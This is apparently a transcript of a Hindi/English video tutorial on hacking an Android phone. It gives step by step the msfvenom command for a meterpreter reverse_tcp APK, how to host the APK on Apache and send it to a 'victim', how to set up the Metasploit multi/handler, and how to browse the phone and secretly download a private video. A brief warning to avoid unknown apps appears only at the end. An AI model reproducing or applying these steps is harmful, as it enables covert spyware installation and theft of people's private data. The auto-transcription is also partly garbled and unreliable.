हेलो एवर्यों वेल्कम टू लर्न विदेक्यू आज एक्चिली हम सीखेंगे कि हम अपने आंड्रोइड फोन को किसा से हैक कर सकते हैं और उसके ओपर हम एक अपने विक्टम को बेज सकते हैं और उसके बाद उसके फोन की एक्चिली आंड्रोइड फोन की जो हमारे पास एक्सेस आ जाएगी हम अपना जो है वह एक्चिली टर्मिनल अन कर लेते हैं अपने काली लिनिक्स में और सबसे पहले हम एक malicious file create करेंगे और उस malicious file करेंगे जो हम actually tool use करेंगे वो है msfvenom so msfvenom hyphen p android android slash meter creator slash reverse underscore tcp और इससे पहले के हम आगे proceed करें हम पहले अपने ip check करेंगे which is 192.168.100.51 next जो है वो हम actually अपने इसमें लिखेंगे lhost equals to 192.168.100.51 और lport हम यहां पर देंगे double two double two hyphen o is the output and हम इसका output जो है वो यहां पर हम कुछ दे देंगे let's suppose मैं यहां पर दिख देता हूँ malicious malicious dot apk और जो है वो हम यहां पर इस file को create कर लेते हैं यह हमें जो है वो actually एक file create करके देगा और उस file में actually हमारे पास एक actually malicious file apk create होगी और उसको फिर हम जो है वो victim को भेजेंगे और victim उसको जैसी क्लिक करके tap करके install करेगा अपने phone में तो उसके phone के access हमारे पास आ जाएगी so this may take a little while alright as you can see the file has been created with this name और हम इस file की location में जाते हैं हम जाएंगे अपने file system में और यहां पर हमारे पास आ रहा है actually root क्योंकि मैं root से लॉगने हूं और यह malicious apk जो है वह हमारे पास root की directory में वह यहां प्रवड़ी है तो मैं यहां से सबसे पहले इसको यहां से copy करूंगा और मैं इसको actually var www.html और यहां पर जो है वह actually मैं इसको paste कर दूंगा malicious.apk को क्योंकि मैं इसको चाहूं तो whatsapp के जरी भी बेज सकता हूं email के थूरू भी बेज सकता हूं victim को और different और तरीके से वेज़ सकता हूं service apache to start हमने आपर कर देना है ताके हमारा जो apache का server है वह actually start हो जाए service और मैं आपर उसका status पहले check करूंगा apache to status और as you can see it is active and running I will hit ctrl c over here और मैं आपर से clear screen कर दूंगा next मैं यहाँ पर जो है अपना पहले listener जो है वो set करूंगा जिसना से मैंने lhost listener host और listener IP मैंने set की थी अपनी machine की तो मैं यहाँ पर जो है वो actually listener set करूंगा which is msf console msf console मैं यहाँ पर स्टार्ट करूंगा और यहां से actually मैं जहूं जो भी incoming connections होंगी उस device से जैसी वो reverse TCP वो connect करेगा मेरी device से जैसी वो वहाँ पर start करेगा तो वो मेरी device से actually वो connect हो जाएगा मतलब वो connection देगा reverse connection दे रहा होगा उसके phone में वो app चल रही होगी और वो जो है वो connect मेरे जो है system से मेरी काली Linux से actually वो होना चारी होगी let me clear this first मैं msf console के अंदर हूं और मैं आपे करूंगा use use exploit slash multi multi slash handler और मेरे पास यहां पर जो default payload set हुए वो जिस जनरेक शेल्ड रिवर्स मैने ये सेट नहीं किया था आपे लोड पे लोड अंडॉड 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 interpreter interpreter slash reverse underscore TCP set Lhost Lhost जो मैंने IP दी थी अपनी पहली काली Linux की वो ही मैं यहां पर दूँगा 168.100.51 और जो मैंने Lport दिया था विच इस 2222 और exploit करूंगा यहां पे और मेरा listener is actually time set हो चुका है next मैं अपने phone में actually आउंगा मैंने victim के लिए वो जो मैंने आपका जो इसमें जो मैंने Apache server run किया है वो मैं अपने browser में जाकर on करूंगा और मैं जो हूं अपने browser में आउंगा और मैं अपने browser में आकर अपनी काली के IP लिखूंगा which is 192.168.100.51 और slash और मैं यहां भी लिख दूंगा slash slash malicious malicious dot apk मैं go press करूंगा as you can see download I will download this file malicious dot apk I will open it और यहां पर वो सारी permissions आपको नजर आ रही है कि यहां पर वो सारी permissions वो आपको नजर आ रही है कि मैं more details obviously यह मैं unknown resource से एक जो हूँ google play store से हटके मैं इसमें डाल रहा हूँ एक application google play store से नहीं है इस वैसे यह warning देता है install anyway installing okay now जैसे ही मैं इस पर actually जो हूँ मैं इसको don't send कर दूंगा और मैं जैसे ही इसको यहां पर से open करूंगा तो मेरे पास यहां पर actually session जो है वो इसका activate हो जाएगा can I have the meter preter session on my Linux अब मैं अपनी home screen पर भी आ जाता हूँ तो आप देख सकते हैं कि मुझे नहीं बदा चल रहा कि जो है वो actually यह यह आ रही है मेरे पास यहां पर main activity यह एक जो है वो app आ रही है जो कि malicious है और मेरे phone में detection नहीं दी कि जनाब आपका phone hack हो चुका और कोई access कर रहा है हाँ अलवत्ता आपका जो है शुरू में जरूर उसने पूछा था कि जनाब यह जो है ना unsafe app है आप play store से हटके download कर रहें install कर रहें तो यह that could be dangerous तो अक्सर लोग use करते हैं play store से हटके भी application तो कोशिच करें कि मुना यूज करें यह होता है so मैं यहाँ पर करूंगा pwd और मैं यहाँ पर मैं उसके files के अंदर हूं और मैं यहाँ पर करता हूं system sys info sorry sys info तो आप देख सकते हैं के android 9 लगावा है as you can see और उसके सारी details यहाँ पर आ रही है next मैं यहाँ पर जहूं मैं इसको cd.dot करूंगा cd.dot i will do this thing this thing at least five times और फिर मैं pwd करूंगा तो मैं इसकी slash directory में आ जाओंगा next मैं यहाँ पर ls करूंगा list करूंगा तो मेरे पास यहाँ पर SD card आ रहा है उसकी storage location को access करने के लिए तो मैं सीडी SD card मैं यहाँ पर access करूंगा और SD card और मैं जैसेכी access करूंगा SD card को तो मैं यहां पर अब इसको dustyogi करे चेक करूंगा कि मैं SD card में हूँ और मैं LS करूँगा तो you can see WhatsApp business यहां पर और भी बहुत सारी चीजें जो है वो actually आ रही होंगी DCIM और यहां पर डाउनलोड जा रहा है और बहुत कुछ कहां पर actually यहां पर आप देख सकते हैं कि वो सारी चीजें आ रही है सो दिससे मेरे पास यहां पर एक वीडियो आ रही है session die कर गया let me see LS again यह session जो है वो actually die कर गया है no worries I will hit again तो मेरे पास दुबारा से access आ जाएगी और मैं दुबारा से बिजाए कूँगा pwd cd dot dot cd dot dot due to some reason connection drop हुआ था cd dot dot pwd ls cd sd card और ls मेंने किया और मैं इस girl video वाली जो है इसको मैं डाउनोड करना चाहता हूँ उसके फोन से as you can see उसके फोन में कोई detection नहीं गया भी भी दुबारा से तो मैं यहां पर करूँगा download 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 मैंने यहां पर यह वाली वीडियो उसकी वाली यहां पर चेली मैं अपने पास download कर लूँगा और वह फोन देखें कि वह फोन जो है वह जो है वह आगछी नॉर्मिल use हो रहा है उसको पताम नहीं चल रहा है कि उसका यहां कर नाउनोड हो गया यहां पर यहां पर बहुत सारी चीज़ें इसके अंदर पडिवी है और इसमें से दिफरेंट और चीज़ें आ रही है so this is actually it or this is the way people actually pack someone's phone so try to avoid such apps and do not try to install applications from unknown resources so अगर आपको यह वीडियो पसंद आई है इसी तरह से आप camera access कर सकते हैं उसकी call logs कर सकते हैं तो मैंने इसको short रखा है you can actually go and type help in metadata so आपको camera के access भी आजाएगे and if you like this video do subscribe my channel और इस video को like करें thank you very much और मुझे kindly support करें ताके मैं आप तक नहीं से नहीं वीडियो लाता रहूं और इंशाल्ला next time में यह तो एक normal app थी मैं इसके अंदर एक original application एक mobile application के अंदर android के अंदर embedded payload आप लोगों को डालना से कहूंगा और इंशाल्ला next video में अपना कहाल रखेगा अल्ला हाफेज और इंशाल्ला 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 इंशाल्